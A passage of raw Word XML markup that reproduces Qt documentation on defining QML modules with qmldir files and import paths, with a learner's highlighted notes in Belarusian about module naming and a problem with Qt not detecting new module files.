      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that defines the module identifier, and describes the object types made available by the module. For example, to make the</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CheckBox</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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DialogBox</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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Slider</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types available for version 1.0 of the module, the</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file would contain the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071332E" w:rsidRPr="0071332E" w:rsidRDefault="0071332E" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Вельмі важны сінтаксіс назвы модуля!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071332E" w:rsidRPr="0071332E" w:rsidRDefault="0071332E" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">А таксама функцыя для дадання імпарт пасу: </w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>engine</w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>addImportPath</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t>module myapp</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mycomponents</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t xml:space="preserve">CheckBox </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CheckBox</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qml</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t xml:space="preserve">DialogBox </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DialogBox</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qml</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Slider </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Slider</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qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, the location of the</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file in the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId313" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must match the module's dotted identifier string. So, say the top level</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myapp</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory is located in</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C:\qml\projects</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and say the module should be identified as "myapp.mycomponents". </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>In this case:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The path</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\qml\projects</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be added to the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId314" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import path</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The qmldir file should be located under</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\qml\projects\myapp\mycomponents\qmldir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once this is done, a QML file located anywhere on the local filesystem can import the module by referring to its URI and the appropriate version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071332E" w:rsidRPr="0071332E" w:rsidRDefault="0071332E" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У мяне ўсё працуе, толькі </w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0071332E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>не бачыць новыя файлы модуля. Не адлюстроўвае іх асобным колерам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> myapp</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mycomponents </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">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A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DialogBox</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CheckBox</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Slider</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
